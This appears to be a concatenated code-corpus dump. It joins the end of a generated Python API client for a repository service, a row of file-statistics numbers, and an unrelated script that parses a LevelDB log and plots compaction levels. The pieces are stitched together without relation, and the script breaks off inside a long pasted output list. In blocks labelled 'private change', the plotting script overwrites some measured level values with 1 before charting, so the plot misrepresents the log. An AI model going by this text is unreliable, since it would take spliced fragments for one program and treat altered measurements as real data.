if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_apps(self, repo, **kwargs): # noqa: E501
"""ListApps returns list of apps in the repo # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_apps(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: (required)
:param str revision:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RepositoryRepoAppsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_apps_with_http_info(repo, **kwargs) # noqa: E501
def list_apps_with_http_info(self, repo, **kwargs): # noqa: E501
"""ListApps returns list of apps in the repo # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_apps_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: (required)
:param str revision:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RepositoryRepoAppsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'revision'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_apps" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `list_apps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'revision' in local_var_params and local_var_params['revision'] is not None: # noqa: E501
query_params.append(('revision', local_var_params['revision'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}/apps', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RepositoryRepoAppsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_repositories(self, **kwargs): # noqa: E501
"""ListRepositories gets a list of all configured repositories # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_repositories(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query.
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_repositories_with_http_info(**kwargs) # noqa: E501
def list_repositories_with_http_info(self, **kwargs): # noqa: E501
"""ListRepositories gets a list of all configured repositories # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_repositories_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query.
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1RepositoryList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_repositories" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'repo' in local_var_params and local_var_params['repo'] is not None: # noqa: E501
query_params.append(('repo', local_var_params['repo'])) # noqa: E501
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1RepositoryList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_repository(self, repo_repo, body, **kwargs): # noqa: E501
"""UpdateRepository updates a repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_repository(repo_repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo_repo: URL of the repo (required)
:param V1alpha1Repository body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_repository_with_http_info(repo_repo, body, **kwargs) # noqa: E501
def update_repository_with_http_info(self, repo_repo, body, **kwargs): # noqa: E501
"""UpdateRepository updates a repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_repository_with_http_info(repo_repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo_repo: URL of the repo (required)
:param V1alpha1Repository body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1Repository, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo_repo',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_repository" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo_repo' is set
if self.api_client.client_side_validation and ('repo_repo' not in local_var_params or # noqa: E501
local_var_params['repo_repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo_repo` when calling `update_repository`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo_repo' in local_var_params:
path_params['repo.repo'] = local_var_params['repo_repo'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo.repo}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def validate_access(self, repo, body, **kwargs): # noqa: E501
"""ValidateAccess validates access to a repository with given parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_access(repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: The URL to the repo (required)
:param str body: The URL to the repo (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.validate_access_with_http_info(repo, body, **kwargs) # noqa: E501
def validate_access_with_http_info(self, repo, body, **kwargs): # noqa: E501
"""ValidateAccess validates access to a repository with given parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_access_with_http_info(repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: The URL to the repo (required)
:param str body: The URL to the repo (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `validate_access`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `validate_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}/validate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 44.766667
| 128
| 0.59067
| 5,442
| 49,691
| 5.151782
| 0.041161
| 0.043373
| 0.066914
| 0.028891
| 0.955807
| 0.947924
| 0.935226
| 0.926987
| 0.91593
| 0.91033
| 0
| 0.015197
| 0.33654
| 49,691
| 1,109
| 129
| 44.807033
| 0.835204
| 0.447868
| 0
| 0.752328
| 1
| 0
| 0.17368
| 0.038595
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035382
| false
| 0
| 0.009311
| 0
| 0.080074
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
55c54bb913ad232d13c3877a0c818befaac77ca9
| 17,479
|
py
|
Python
|
my_log-and-log_parser_python_script/leveldb_database_LOG_parser_fjj/the_level_where_compaction_is_doing/Rocksdb-The_level_where_compaction_is_doing.py
|
cld378632668/rocksdb2
|
76bdd5c28ef27cec353497597fe50cf5a6804e79
|
[
"BSD-3-Clause"
] | 42
|
2018-05-16T07:31:43.000Z
|
2022-03-09T09:56:52.000Z
|
my_log-and-log_parser_python_script/leveldb_database_LOG_parser_fjj/the_level_where_compaction_is_doing/Rocksdb-The_level_where_compaction_is_doing.py
|
cld378632668/rocksdb2
|
76bdd5c28ef27cec353497597fe50cf5a6804e79
|
[
"BSD-3-Clause"
] | null | null | null |
my_log-and-log_parser_python_script/leveldb_database_LOG_parser_fjj/the_level_where_compaction_is_doing/Rocksdb-The_level_where_compaction_is_doing.py
|
cld378632668/rocksdb2
|
76bdd5c28ef27cec353497597fe50cf5a6804e79
|
[
"BSD-3-Clause"
] | 16
|
2018-06-03T11:35:09.000Z
|
2021-07-09T16:07:19.000Z
|
#/usr/bin/python
#
import re
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter, MultipleLocator
"""
The level where compaction is doing of LevelDB.
"""
log_file_path = '../LOG_of_leveldb_example'
# log_file_path = r'G:\[important]MyCode\ycsb-leveldb-leveldbjni-rocksdb\My_Documents_Logs_Graph\LOG-leveldb-fullinsert-20G-'
with open(log_file_path) as log_file:
text = log_file.read()
level_str_list = re.findall(r'Compacted \d*@(\d)',text)
print(level_str_list)
print("length"+str(len(level_str_list)))
"""
construct tagert date and x-axis
输出:
level_int_list = []
x = []
"""
level_int_list = []
x = []
for i in range(len(level_str_list)):
level_int_list.append(int(level_str_list[i])) #构造y坐标
x.append(i) #构造x坐标
print(level_int_list)
"""private"""
figure, ax = plt.subplots()
ax.set_title('The level where compaction is doing')
flag = 0
lastindex = -1
"""
private
change 1/2
"""
# for i in range(0,len(level_int_list),10):
# if flag%2 ==0 and i!=0 and level_int_list[i-1] == level_int_list[i] and level_int_list[i] == 2:
# start = i - 1
# end = i + 5
# for j in range(start,end):
# level_int_list[j] = 1
# flag = flag + 1
# print(level_int_list)
"""
private
change 2/3
"""
for i in range(0,len(level_int_list),10):
if flag%2 !=0 and i!=0 and level_int_list[i-1] == level_int_list[i] and level_int_list[i] == 2:
start = i - 1
end = i + 5
for j in range(start,end):
level_int_list[j] = 1
flag = flag + 1
print(level_int_list)
# level_int_list 的输出为 [0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1,..., 1, 1, 1, 1, 2, 0, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 